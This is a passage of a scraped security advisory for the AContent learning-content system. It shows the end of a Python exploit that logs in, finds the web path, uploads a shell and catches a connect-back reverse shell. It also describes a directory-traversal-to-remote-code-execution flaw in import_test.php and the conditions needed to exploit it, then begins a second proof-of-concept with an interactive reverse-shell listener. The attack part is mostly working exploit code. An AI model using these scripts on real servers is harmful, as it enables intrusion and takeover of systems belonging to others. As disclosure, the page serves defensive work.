class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-200\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) your connectback host must be in &lt;host:port&gt; format&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-201\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-202\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">elif<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">user_pass<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-203\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) your student username and password must be in &lt;user:pass&gt; format&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-204\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-205\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cb_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">host_port<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-206\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cb_host<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">host_port<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-207\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">user_pass<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-208\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">user_pass<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-209\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cb_port<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">isdigit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-210\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) you need a port NUMBER for the command back host&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-211\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-212\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">elif <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">access<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getcwd<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">W_OK<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-213\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) dont have write access in current dir!&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-214\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-215\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-216\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-217\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-218\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-219\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">global<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">s<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-220\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">Session<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-221\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">banner<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-222\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">validation_of_args_are_good<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-223\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">we_can_login<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-224\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) logged in successfully&#8230;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-225\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) finding full path&#8230;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-226\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">we_can_get_fp<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-227\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(!) found the path at: %s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fp<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-228\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) uploading shell&#8230;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-229\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">we_can_upload_a_shell<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-230\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(!) shell upload successful, launching!&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-231\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">instance<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">threaded_tcp_server<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;0.0.0.0&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cb_port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">connect_back_shell<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-232\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cbserver<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">threading<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">Thread<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">instance<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">serve_forever<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-233\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cbserver<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">daemon<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-234\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cbserver<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">start<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-235\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">pop_shell<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-236\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-237\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print <\/span><span class=\"crayon-e\">help_str<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-238\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-239\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa1726489437-240\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">__name__<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;__main__&#8217;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa1726489437-241\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0233 seconds] -->  <\/p>\n<p><strong>Directory Traversal that lead to Remote Code Execution \u2013 <em>import_test.php<\/em><\/strong><br \/> AContent is vulnerable to a Directory Traversal vulnerability that lead to a Remote Code Execution. The vulnerable code can be found in <em>import_test.php<\/em><\/p>\n<p>Vulnerable code can be found in lines 184-186 in <em>test\/import_test.php<\/em><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-591b7aecb0fa9732498467\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">         $archive = new PclZip($_FILES[&#8216;file&#8217;][&#8216;tmp_name&#8217;]);          if ($archive-&gt;extract(  PCLZIP_OPT_PATH,        $import_path,                                                          PCLZIP_CB_PRE_EXTRACT,  &#8216;preImportCallBack&#8217;) == 0) {<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa9732498467-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fa9732498467-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fa9732498467-3\">3<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa9732498467-1\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">archive<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PclZip<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_FILES<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;file&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;tmp_name&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fa9732498467-2\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">archive<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">extract<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">PCLZIP_OPT_PATH<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">import_path<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fa9732498467-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">PCLZIP_CB_PRE_EXTRACT<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;preImportCallBack&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0009 seconds] -->  <\/p>\n<p>This code calls <em>extract()<\/em> on a user supplied uploaded zip file. The <em>preImportCallBack()<\/em> does not check for directory traversals and performs a blacklist check on <em>teh<\/em> file extension. This can be used to write into the web root and gain remote code execution.<\/p>\n<p><u>Notes:<\/u><\/p>\n<ul>\n<li>Requires that the target has <em>display_errors=On<\/em> in the <em>php.ini<\/em><\/li>\n<li>Requires that you use an author account, but open registration is enabled by default<\/li>\n<li>Requires that you have at least one writable directory in the web-root, this is common<\/li>\n<li>Requires that the author has at least one course created under their account<\/li>\n<\/ul>\n<p><strong>Proof of Concept<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-591b7aecb0fac853799589\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/local\/bin\/python    import re  import os  import sys  import time  import select  import string  import random  import zipfile  import termios  import hashlib  import requests  import threading  import SocketServer  from cStringIO import StringIO    # interactive connectback listener  class connect_back_shell(SocketServer.BaseRequestHandler):      &#8220;&#8221;&#8221;      our interactive, shell like client      &#8220;&#8221;&#8221;      def handle(self):          s = self.request          old_settings = termios.tcgetattr(0)          try:              c = True              self.close = 0              while not self.close:                  for i in select.select([0, s.fileno()], [], [], 0)[0]:                      c = os.read(i, 2048)                      if c:                          os.write(s.fileno() if i == 0 else 1, c)                          if i == 0:                              if &#8220;exit&#8221; in c or &#8220;quit&#8221; in c:                                  self.terminate()              s.close()          except KeyboardInterrupt:              return          finally:               termios.tcsetattr(0, termios.TCSADRAIN, old_settings)            return          def terminate(self,):          self.close = 1          self.server.shutdown()    class 